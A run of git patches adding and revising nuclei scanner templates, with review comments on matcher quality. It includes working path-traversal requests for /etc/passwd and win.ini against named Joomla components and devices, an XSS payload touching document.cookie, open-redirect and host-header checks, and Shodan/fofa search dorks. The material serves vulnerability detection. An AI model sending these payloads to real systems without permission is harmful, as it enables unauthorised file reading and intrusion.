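Review bot: The regex matcher `"root:.*:0:0"` is a weaker signal than the `"root:[x*]:0:0"` form used by karel-ip-phone-lfi in this same series: it fires on any line where `root:` is followed later by `:0:0`, not only on a passwd entry with an `x` or `*` password field. Suggest `- "root:[x*]:0:0"` so the two LFI templates agree and false positives on pages that echo unrelated text are less likely. The payload also relies on `%00` truncating the include path, which presumably only works on PHP builds that still accept null bytes in file paths; a sentence in the description saying that a non-match does not prove the component is patched would help triage.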
@@ -0,0 +1,27 @@
+id: CVE-2010-1472
+
+info:
+ name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12167
+ - https://www.cvedetails.com/cve/CVE-2010-1472
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From 99d51ba4bcfd783fe4b2f1bd99e25ded515f2d71 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Mon, 6 Sep 2021 17:54:33 +0900
Subject: [PATCH 062/339] Create karel-ip-phone-lfi.yaml
---
 karel-ip-phone-lfi.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 karel-ip-phone-lfi.yaml
diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml
new file mode 100644
index 0000000000..c18a46fbf8
--- /dev/null
+++ b/karel-ip-phone-lfi.yaml
@@ -0,0 +1,24 @@
+id: karel-ip-phone-lfi
+
+info:
+ name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ reference: https://cxsecurity.com/issue/WLB-2020100038
+ tags: karel,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From 37b81df9cc6e432762452daa8cd924c9d306ba61 Mon Sep 17 00:00:00 2001
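Review bot: `karel-ip-phone-lfi.yaml` is created at the repository root instead of under a category directory such as `vulnerabilities/other/`, which is where the sibling `minimouse-lfi.yaml` from the same batch is moved later in this series; `phpwiki-lfi.yaml` (patch 088) has the same placement and neither is moved in the patches visible here. The template also has no `description`, unlike the CVE templates around it, so the context lives only behind the reference link. A one-liner derived from the request is enough: `description: The Karel IP1211 web management panel reads arbitrary files through the page parameter of cgi-bin/cgiServer.exx.` Adding `part: body` to the regex matcher would make the intent explicit.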
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Mon, 6 Sep 2021 17:56:20 +0900
Subject: [PATCH 063/339] Create minimouse-lfi.yaml
---
 minimouse-lfi.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 minimouse-lfi.yaml
diff --git a/minimouse-lfi.yaml b/minimouse-lfi.yaml
new file mode 100644
index 0000000000..b5c828851c
--- /dev/null
+++ b/minimouse-lfi.yaml
@@ -0,0 +1,26 @@
+id: minimouse-lfi
+
+info:
+ name: Mini Mouse 9.2.0 - Path Traversal
+ author: 0x_Akoko
+ severity: high
+ reference: https://www.exploit-db.com/exploits/49744
+ tags: minimouse,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
From 278ae78af02cb01b5d17965df5fd39dff5f48373 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Mon, 6 Sep 2021 17:58:24 +0900
Subject: [PATCH 064/339] Create CVE-2019-7275.yaml
---
 CVE-2019-7275.yaml | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 CVE-2019-7275.yaml
diff --git a/CVE-2019-7275.yaml b/CVE-2019-7275.yaml
new file mode 100644
index 0000000000..a3e1a53202
--- /dev/null
+++ b/CVE-2019-7275.yaml
@@ -0,0 +1,19 @@
+id: CVE-2019-7275
+
+info:
+ name: Open Redirect in Optergy Proton/Enterprise BMS
+ author: 0x_Akoko
+ reference: https://cxsecurity.com/issue/WLB-2019110074
+ severity: low
+ tags: cves,optergy,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/updating.jsp?url=https://example.com/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
From 1f5da5331757d50c1ed7eeebb483e4af23fd2df8 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 6 Sep 2021 18:00:23 +0900 Subject: [PATCH 065/339] Update minimouse-lfi.yaml --- minimouse-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/minimouse-lfi.yaml b/minimouse-lfi.yaml index b5c828851c..b87dc7de10 100644 --- a/minimouse-lfi.yaml +++ b/minimouse-lfi.yaml @@ -1,7 +1,7 @@ id: minimouse-lfi info: - name: Mini Mouse 9.2.0 - Path Traversal + name: Mini Mouse 9.2.0 - Path Traversal author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/49744 From 861af1bdc8339b2c65869f1d135a9be5f9ef9ea5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:39:22 +0530 Subject: [PATCH 066/339] Update and rename CVE-2019-7275.yaml to cves/2019/CVE-2019-7275.yaml --- CVE-2019-7275.yaml => cves/2019/CVE-2019-7275.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename CVE-2019-7275.yaml => cves/2019/CVE-2019-7275.yaml (60%) diff --git a/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml similarity index 60% rename from CVE-2019-7275.yaml rename to cves/2019/CVE-2019-7275.yaml index a3e1a53202..1945fe217d 100644 --- a/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -3,9 +3,12 @@ id: CVE-2019-7275 info: name: Open Redirect in Optergy Proton/Enterprise BMS author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2019110074 severity: low - tags: cves,optergy,redirect + reference: + - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html + - https://applied-risk.com/resources/ar-2019-008 + - https://cxsecurity.com/issue/WLB-2019110074 + tags: cve,cve2019,redirect requests: - method: GET From 7579fe98c2466fc0d15cdd56ab0f8eb4c88aca55 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Mon, 6 Sep 2021 14:44:39 +0530 Subject: [PATCH 067/339] Update and rename minimouse-lfi.yaml to vulnerabilities/other/minimouse-lfi.yaml --- minimouse-lfi.yaml => vulnerabilities/other/minimouse-lfi.yaml | 1 + 1 file changed, 1 insertion(+) rename minimouse-lfi.yaml => vulnerabilities/other/minimouse-lfi.yaml (99%) diff --git a/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml similarity index 99% rename from minimouse-lfi.yaml rename to vulnerabilities/other/minimouse-lfi.yaml index b87dc7de10..2fe4f3ad61 100644 --- a/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml @@ -17,6 +17,7 @@ requests: - type: status status: - 200 + - type: word words: - "bit app support" From 6ef02fe9dd367e95117881479e663058842e75d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 14:47:45 +0530 Subject: [PATCH 068/339] Update karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml index c18a46fbf8..d911d65f7e 100644 --- a/karel-ip-phone-lfi.yaml +++ b/karel-ip-phone-lfi.yaml @@ -4,7 +4,9 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2020100038 + reference: + - https://cxsecurity.com/issue/WLB-2020100038 + - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon tags: karel,lfi requests: From 21a7fc63a50880b0e667023f7d4bf03ed342d21b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 15:16:12 +0530 Subject: [PATCH 069/339] Update CVE-2021-29625.yaml --- cves/2021/CVE-2021-29625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 65318224ba..26175c05d3 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml 
@@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%27%3E%3Csvg/onload=alert(document.cookie)%3E' + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "'>" + - "" part: body - type: word From c105e41fa40f0aa7afdbe932d371fc85857ab4d1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 16:13:17 +0530 Subject: [PATCH 070/339] Added OpenVPN Host Header Injection Co-Authored-By: me_dheeraj <9442273+Dheerajmadhukar@users.noreply.github.com> --- vulnerabilities/other/openvpn-hhi.yaml | 27 ++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/openvpn-hhi.yaml diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml new file mode 100644 index 0000000000..8da79e0901 --- /dev/null +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -0,0 +1,27 @@ +id: openvpn-hhi + +info: + name: OpenVPN Host Header Injection + author: twitter.com/Dheerajmadhukar + severity: info + tag: openvpn,hhi + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + + - type: word + words: + - "https://{{randstr}}.tld/__session_start__/" + - "openvpn_sess" + part: header + condition: and + + - type: status + status: + - 302 From cec54e6d518e7d5862b904272ea423faccd3c0bc Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 16:15:07 +0530 Subject: [PATCH 071/339] tags update Co-Authored-By: me_dheeraj <9442273+Dheerajmadhukar@users.noreply.github.com> --- vulnerabilities/other/openvpn-hhi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 8da79e0901..73ecf8ec1c 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml 
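Review bot: The new word matcher line shows as `- ""` in this view and the removed one as `- "'>"`, which looks like the HTML markup was stripped during page extraction rather than what was committed; if the committed value really is an empty string, the word matcher passes on every response and the `matchers-condition: and` degenerates into a bare status check. The value should be the decoded form of the payload carried in the new `table=` parameter so that only a verbatim reflection matches. The enclosing `requests` entry starts before this hunk.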
@@ -4,7 +4,7 @@ info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar severity: info - tag: openvpn,hhi + tags: openvpn,hhi requests: - raw: From 47a892d375c7891006e8f196a3a6dc2a1d07c813 Mon Sep 17 00:00:00 2001 From: push4d <50226388+push4d@users.noreply.github.com> Date: Mon, 6 Sep 2021 13:21:29 +0200 Subject: [PATCH 072/339] Add files via upload --- cves/2021/CVE-2021-20114.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2021/CVE-2021-20114.yaml diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml new file mode 100644 index 0000000000..c96a554177 --- /dev/null +++ b/cves/2021/CVE-2021-20114.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-20114 + +info: + name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor + author: n/a + severity: high + reference: https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true + description: | + When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. + tags: cve,cve2021,tcexam + +requests: + - method: GET + path: + - "{{BaseURL}}/cache/backup/" + + matchers: + - type: status + status: + - 200 \ No newline at end of file From 6563f9be814588136437d2bbd190f654ad3c7b07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 16:56:14 +0530 Subject: [PATCH 073/339] Update CVE-2019-11013.yaml --- cves/2019/CVE-2019-11013.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml index ba86250503..afd00e4a16 100644 --- a/cves/2019/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml 
@@ -4,7 +4,9 @@ info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/47301 + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 tags: cve,cve2019,lfi,nimble requests: From 6abfcd80e1052425254d2931270b04f3376afc23 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:13:20 +0530 Subject: [PATCH 074/339] Create host-header-injection.yaml --- .../generic/host-header-injection.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/vulnerabilities/generic/host-header-injection.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 From 842f66380f61b163fd9ce94bac8697f9cb4464ca Mon Sep 17 00:00:00 2001 
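Review bot: `condition: and` under a single-entry `words` list does nothing, and the check itself only shows that the supplied `Host` value is reflected somewhere in a 200 body, not that it reaches a link, redirect or cache key; the `description` describes the general vulnerability class, so it should say what the template actually detects, e.g. `description: Detects reflection of an attacker-controlled Host header value in the response body, which may indicate that links or redirects are built from the Host header; manual confirmation is required.` The same file is deleted by the revert in patch 075 and re-created byte-for-byte in patch 076, so this applies to that hunk as well.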
From: Prince Chaddha Date: Mon, 6 Sep 2021 17:13:48 +0530 Subject: [PATCH 075/339] Revert "Create host-header-injection.yaml" This reverts commit 6abfcd80e1052425254d2931270b04f3376afc23. --- .../generic/host-header-injection.yaml | 32 ------------------- 1 file changed, 32 deletions(-) delete mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml deleted file mode 100644 index 9166fdec4d..0000000000 --- a/vulnerabilities/generic/host-header-injection.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: host-header-injection - -info: - name: Host Header Injection - author: princechaddha - severity: info - description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. - reference: - - https://portswigger.net/web-security/host-header - - https://portswigger.net/web-security/host-header/exploiting - - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ - tags: hostheader-injection,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - headers: - Host: "{{randstr}}.tld" - - matchers-condition: and - matchers: - - type: word - words: - - '{{randstr}}.tld' - part: body - condition: and - - - type: status - status: - - 200 From acd46242008553c52b03928308ead6a9d808e174 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:14:27 +0530 Subject: [PATCH 076/339] Create host-header-injection.yaml --- .../generic/host-header-injection.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null 
+++ b/vulnerabilities/generic/host-header-injection.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 From 1942d13ed6e3b89e1e2063e0a8fca881a489b564 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:15:30 +0530 Subject: [PATCH 077/339] Update openvpn-hhi.yaml --- vulnerabilities/other/openvpn-hhi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 73ecf8ec1c..2611426abb 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -4,7 +4,7 @@ info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar severity: info - tags: openvpn,hhi + tags: openvpn,hostheader-injection requests: - raw: From e1ab21616f0752e849104a9146a4778b0fe6b0f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:30:51 +0530 Subject: [PATCH 078/339] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index c96a554177..c0a6d7dbf0 100644 --- a/cves/2021/CVE-2021-20114.yaml 
+++ b/cves/2021/CVE-2021-20114.yaml @@ -4,17 +4,26 @@ info: name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor author: n/a severity: high - reference: https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true - description: | - When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. - tags: cve,cve2021,tcexam + description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. + reference: + - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true + - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 + tags: cve,cve2021,tcexam,disclosure requests: - method: GET path: - "{{BaseURL}}/cache/backup/" + matchers-condition: and matchers: + - type: word + words: + - "Index of /cache/backup" + - "Parent Directory" + - ".sql.gz" + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From e9d5665383db40a06c6b91aa8f023f31a4b7f0e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:34:51 +0530 Subject: [PATCH 079/339] Update gsoap-lfi.yaml --- vulnerabilities/other/gsoap-lfi.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/gsoap-lfi.yaml b/vulnerabilities/other/gsoap-lfi.yaml index f7bd7c67e7..e679dee126 100644 --- a/vulnerabilities/other/gsoap-lfi.yaml +++ b/vulnerabilities/other/gsoap-lfi.yaml 
@@ -8,9 +8,13 @@ info: tags: gsoap,lfi requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../../../../etc/passwd" + - raw: + - | + GET /../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 + Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close matchers-condition: and matchers: From 54e5eea58124202e3b34ee07f84a1c495b84fa82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:48:01 +0530 Subject: [PATCH 080/339] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index c0a6d7dbf0..981a841397 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -2,7 +2,7 @@ id: CVE-2021-20114 info: name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor - author: n/a + author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. reference: From ec072ea1c83390d2e1c4d951e9a42432af37092e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 20:11:21 +0530 Subject: [PATCH 081/339] misc update --- default-logins/abb/cs141-default-login.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 531ed5ae2d..1f3cfe52ce 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml 
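Review bot: Switching from `path` to a `raw` request is presumably meant to keep the `/../../` segments from being normalised before they leave the client, but nothing in the hunk records that intent, and a raw request may still be sent through the standard client unless `unsafe: true` is set on the request; a one-line comment such as `# raw request so the dot segments are sent verbatim` or that flag would make the behaviour explicit (verify against the nuclei version in use). The copied browser headers (`Accept`, `Accept-Language: tr-TR,...`) are not needed for the check and turn the request into a fingerprint of one person's browser; `Host` and `Connection: close` are enough. The `matchers` block that follows is outside the hunk.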
@@ -6,6 +6,8 @@ info: severity: medium reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login + additional-fields: + shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: - raw: From 8ed50e204ff49278a8dd849ec8d36ae25ab66a78 Mon Sep 17 00:00:00 2001 From: ahmetpergamum Date: Mon, 6 Sep 2021 17:52:56 +0300 Subject: [PATCH 082/339] Added Watchguard Panel Template --- exposed-panels/watchguard.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/watchguard.yaml diff --git a/exposed-panels/watchguard.yaml b/exposed-panels/watchguard.yaml new file mode 100644 index 0000000000..e1af7a14ae --- /dev/null +++ b/exposed-panels/watchguard.yaml @@ -0,0 +1,25 @@ +id: watchguard + +info: + name: Watchguard + author: ahmetpergamum + severity: info + reference: https://www.exploit-db.com/ghdb/7008 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/sslvpn_logon.shtml' + + matchers-condition: and + matchers: + - type: word + words: + - 'User Authentication' + - 'WatchGuard Technologies' + condition: or + + - type: status + status: + - 200 From 5450030da6ef2de9aa997a92edfca336dfbb3317 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 6 Sep 2021 21:20:15 +0530 Subject: [PATCH 083/339] Add files via upload --- technologies/iplanet-web-server-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/iplanet-web-server-detect.yaml diff --git a/technologies/iplanet-web-server-detect.yaml b/technologies/iplanet-web-server-detect.yaml new file mode 100644 index 0000000000..53d293ec84 --- /dev/null +++ b/technologies/iplanet-web-server-detect.yaml 
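Review bot: With `condition: or` the panel is reported whenever `/sslvpn_logon.shtml` contains just `User Authentication`, a phrase common to many unrelated login pages, so the vendor string is doing no work; either drop the generic word or change the line to `condition: and`. A later patch in this series only fixes whitespace in this block and leaves the condition as is. The template also has no `description`; a short one naming the WatchGuard SSL VPN logon page would help triage.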
@@ -0,0 +1,21 @@ +id: iPlanet-web-server-detect +info: + name: Detect iPlanet Webserver Detection + author: pussycat0x + severity: info + reference: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" - fofa query + tags: default,tech +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "iPlanet" + condition: and + - type: status + status: + - 200 \ No newline at end of file From ea21075b712ceebd9a7ce28184bc43db3ce791de Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 23:57:29 +0530 Subject: [PATCH 084/339] misc update --- ...eb-server-detect.yaml => iplanet-web-server.yaml} | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) rename technologies/{iplanet-web-server-detect.yaml => iplanet-web-server.yaml} (62%) diff --git a/technologies/iplanet-web-server-detect.yaml b/technologies/iplanet-web-server.yaml similarity index 62% rename from technologies/iplanet-web-server-detect.yaml rename to technologies/iplanet-web-server.yaml index 53d293ec84..1b3b79c375 100644 --- a/technologies/iplanet-web-server-detect.yaml +++ b/technologies/iplanet-web-server.yaml @@ -1,21 +1,25 @@ -id: iPlanet-web-server-detect +id: iplanet-web-server + info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info - reference: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" - fofa query - tags: default,tech + tags: tech + additional-fields: + fofa-dork: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "iPlanet" - condition: and + - type: status status: - 200 \ No newline at end of file From fe784d49e0584a856b4a564e44dcabc3129731f2 Mon Sep 17 00:00:00 2001 
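Review bot: After the rename the only signal is the word `iPlanet` anywhere in the body of `/`, so any page that merely mentions the product (a documentation site, a vendor listing) is reported as running the server; if the server emits a product banner, a second word matcher with `part: header` would be a far stronger signal, and the `fofa-dork` recorded in `additional-fields` suggests what fingerprint the query relied on. `name: Detect iPlanet Webserver Detection` reads doubled; `name: iPlanet Web Server Detect` matches the new id. The last line still ends without a trailing newline, which the rename did not fix.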
From: sandeep Date: Tue, 7 Sep 2021 00:00:25 +0530 Subject: [PATCH 085/339] misc update --- exposed-panels/{watchguard.yaml => watchguard-panel.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{watchguard.yaml => watchguard-panel.yaml} (81%) diff --git a/exposed-panels/watchguard.yaml b/exposed-panels/watchguard-panel.yaml similarity index 81% rename from exposed-panels/watchguard.yaml rename to exposed-panels/watchguard-panel.yaml index e1af7a14ae..6029717174 100644 --- a/exposed-panels/watchguard.yaml +++ b/exposed-panels/watchguard-panel.yaml @@ -1,7 +1,7 @@ -id: watchguard +id: watchguard-panel info: - name: Watchguard + name: Watchguard Panel author: ahmetpergamum severity: info reference: https://www.exploit-db.com/ghdb/7008 @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - 'User Authentication' + - 'User Authentication' - 'WatchGuard Technologies' condition: or From 56b02ed87b6943fbcc758bf59f260d240d47d70f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 7 Sep 2021 07:35:15 +0700 Subject: [PATCH 086/339] Create CVE-2010-1534.yaml --- cves/2010/CVE-2010-1534.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1534.yaml diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml new file mode 100644 index 0000000000..871c657677 --- /dev/null +++ b/cves/2010/CVE-2010-1534.yaml 
@@ -0,0 +1,27 @@
+id: CVE-2010-1534
+
+info:
+ name: Joomla! Component Shoutbox Pro - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12067
+ - https://www.cvedetails.com/cve/CVE-2010-1534
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From 541d48c25e57885eafb5ba7fc6e5c7b871a7722a Mon Sep 17 00:00:00 2001
